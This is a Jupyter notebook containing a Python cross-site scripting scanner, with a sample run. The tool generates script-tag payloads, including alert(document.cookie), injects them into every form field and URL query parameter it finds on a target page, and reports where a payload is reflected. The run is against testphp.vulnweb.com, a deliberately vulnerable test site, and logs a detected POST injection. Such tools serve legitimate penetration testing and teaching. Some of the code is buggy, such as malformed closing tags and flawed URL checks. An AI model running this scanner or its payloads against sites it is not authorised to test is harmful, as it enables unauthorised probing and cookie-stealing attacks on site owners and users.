In [1]:
from random import randint
from bs4 import BeautifulSoup
from urllib.parse import urljoin, urlparse, parse_qs, urlencode
from datetime import datetime
import requests
import json

In [2]:
# Style class
N = '\033[0m'
W = '\033[1;37m' 
B = '\033[1;34m' 
M = '\033[1;35m' 
R = '\033[1;31m' 
G = '\033[1;32m' 
Y = '\033[1;33m' 
C = '\033[1;36m' 

In [3]:
#Printing Logs with Different Colors
class Log:
    @classmethod
    def info(self, text):
        print("["+Y+datetime.now().strftime("%H:%M:%S")+N+"] ["+G+"INFO"+N+"] "+text)
        
    @classmethod
    def warning(self, text):
        print("["+Y+datetime.now().strftime("%H:%M:%S")+N+"] ["+Y+"WARNING"+N+"] "+text)
        
    @classmethod
    def high(self, text):
        print("["+Y+datetime.now().strftime("%H:%M:%S")+N+"] ["+R+"CRITICAL"+N+"] "+text)

In [4]:
# Session Function

def session(proxies, headers, cookie):
    requestVariable = requests.Session()
    requestVariable.proxies = proxies
    requestVariable.headers = headers
    requestVariable.cookies.update(json.loads(cookie))
    return requestVariable

In [5]:
class core:
    @classmethod
    def generate(self, eff):
        FUNCTION = [
            "prompt(5000/200)",
            "alert(6000/3000)",
            "alert(document.cookie)",
            "prompt(document.cookie)",
            "console.log(5000/3000)"
        ]
        if eff == 1:
            return "<script/>"+FUNCTION[randint(0, 4)]+"<\script\>"

        elif eff == 2:
            return "<\script/>"+FUNCTION[randint(0, 4)]+"<\\script>"

        elif eff == 3:
            return "<\script\> "+FUNCTION[randint(0, 4)]+"<//script>"

        elif eff == 4:
            return "<script>"+FUNCTION[randint(0, 4)]+"<\script/>"

        elif eff == 5:
            return "<script>"+FUNCTION[randint(0, 4)]+"<//script>"

        elif eff == 6:
            return "<script>"+FUNCTION[randint(0, 4)]+"</script>"

    @classmethod
    def post_method(self):
        bsObj = BeautifulSoup(self.body, "html.parser")
        # Parsing search or any other posting content
        forms = bsObj.find_all("form", method=True)
        
        for form in forms:
            try: 
                action = form["action"]
            except KeyError:
                action = self.url
                
            if form["method"].lower().strip() == "post":
                Log.warning("Target have form with POST method: " + C + urljoin(self.url, action))
                Log.info("Collection from input key.......")
                
                keys = {}
                
                for key in form.find_all(["input", "textarea"]):
                    try: 
                        if key["type"] == "submit":
                            Log.info("Form key name: " + G + key["name"] + N + " value: " + G + "Submit Confirm")
                            keys.update({key["name"]: key["name"]})
                        
                        else:
                            Log.info("Form key name: " + G + key["name"] + N + " value " + G + self.payload)
                            keys.update({key["name"]: self.payload})
                    except Exception as e:
                        Log.info("Internal error " + str(e))
            
                            
        Log.info("Sending payload (POST) method...")
        req = self.session.post(urljoin(self.url, action), data = keys)
        if self.payload in req.text:
            Log.high("Detected XSS (POST) at " + urljoin(self.url, req.url))
            Log.high("Post data: " + str(keys))
        else:
            Log.info("This page is safe from XSS (POST) attack but not 100% yet......")
            
            
    @classmethod
    def get_method_form(self):
        bsObj = BeautifulSoup(self.body, "html.parser")
        forms = bsObj.find_all("form", method=True)

        for form in forms:
            try:
                action = form["action"]
            except KeyError:
                action = self.url

            if form["method"].lower().strip() == "get":
                Log.warning("Target have form with GET method: " +
                            C+urljoin(self.url, action))
                Log.info("Collecting form input key.....")

                keys = {}
                for key in form.find_all(["input", "textarea"]):
                    try:
                        if key["type"] == "submit":
                            Log.info(
                                "Form key name: "+G+key["name"]+N+" value: "+G+"<Submit Confirm>")
                            keys.update({key["name"]: key["name"]})

                        else:
                            Log.info("Form key name: "+G +
                                     key["name"]+N+" value: "+G+self.payload)
                            keys.update({key["name"]: self.payload})

                    except Exception as e:
                        Log.info("Internal error: "+str(e))
                        try:
                            Log.info("Form key name: "+G +
                                     key["name"]+N+" value: "+G+self.payload)
                            keys.update({key["name"]: self.payload})
                        except KeyError as e:
                            Log.info("Internal error: "+str(e))

                Log.info("Sending payload (GET) method...")
                req = self.session.get(urljoin(self.url, action), params=keys)
                if self.payload in req.text:
                    Log.high("Detected XSS (GET) at " +
                             urljoin(self.url, req.url))
                    Log.high("GET data: "+str(keys))
                else:
                    Log.info("Not vulnerable.")

    @classmethod
    def get_method(self):
        bsObj = BeautifulSoup(self.body, "html.parser")
        links = bsObj.find_all("a", href=True)
        for a in links:
            url = a["href"]
            if url.startswith("http://") is False or url.startswith("https://") is False or url.startswith("mailto:") is False:
                base = urljoin(self.url, a["href"])
                query = urlparse(base).query
                if query != "":
                    Log.warning("Found link with query: "+G +
                                query+N+" Maybe a vulnerable XSS point.")

                    query_payload = query.replace(
                        query[query.find("=")+1:len(query)], self.payload, 1)
                    test = base.replace(query, query_payload, 1)

                    query_all = base.replace(query, urlencode(
                        {x: self.payload for x in parse_qs(query)}))

                    Log.info("Query (GET) : "+test)
                    Log.info("Query (GET) : "+query_all)

                    _respon = self.session.get(test)
                    if self.payload in _respon.text or self.payload in self.session.get(query_all).text:
                        Log.high("Detected XSS (GET) at "+_respon.url)
                    else:
                        Log.info(
                            "This page is safe from XSS (GET) attack but not 100% yet...")
        
        
    @classmethod
    def main(self, url, proxy, headers, cookie, payload, method):
        self.payload = payload
        print("*"*15)
        self.url = url
        self.session = session(proxy, headers, cookie)
        
        Log.info("Checking connection to: " + Y + url)
        try:
            ctr = self.session.get(url)
            self.body = ctr.text
        except Exception as e:
            Log.high("Internal error: " + str(e))
            return
        
        if ctr.status_code > 400:
            Log.info("Connection failed "+G+str(ctr.status_code))
            return
        else:
            Log.info("Connection estabilished "+G+str(ctr.status_code))
            
        if method == 2:
            self.post_method()
            self.get_method()
            self.get_method_form()

In [6]:
def check_payload(payload):
    default = 6
    if default >= 6 and payload is None:
        Log.info("Do you want to use custom payload (Y/n)?")
        answer = input("> {W}")
        if answer.lower().strip() == "y":
            Log.info("Write the XSS payload below")
            payload = input("> {W}")
        else:
            payload = core.generate(randint(1, 6))
            
    else:
        payload = core.generate(payload)
    
    return payload

In [16]:
def start():
    url = input("Enter the URL")
    cookie = '{"ID":"1094200543"}'
    proxy='None'
    headers='None'
    payload = check_payload(None)
    if url:
        core.main(url, proxy, headers, cookie, payload, method=2)
        #crawler.crawl(url)

In [17]:
if __name__ == "__main__":
    start()

Enter the URLhttp://testphp.vulnweb.com/
[20:26:17] [INFO] Do you want to use custom payload (Y/n)?
> {W}n
***************
[20:26:19] [INFO] Checking connection to: http://testphp.vulnweb.com/
[20:26:20] [INFO] Connection estabilished 200
[20:26:20] [WARNING] Target have form with POST method: http://testphp.vulnweb.com/search.php?test=query
[20:26:20] [INFO] Collection from input key.......
[20:26:20] [INFO] Form key name: searchFor value <script>alert(6000/3000)<//script>
[20:26:20] [INFO] Form key name: goButton value: Submit Confirm
[20:26:20] [INFO] Sending payload (POST) method...
[20:26:20] [CRITICAL] Detected XSS (POST) at http://testphp.vulnweb.com/search.php?test=query
[20:26:20] [CRITICAL] Post data: {'searchFor': '<script>alert(6000/3000)<//script>', 'goButton': 'goButton'}
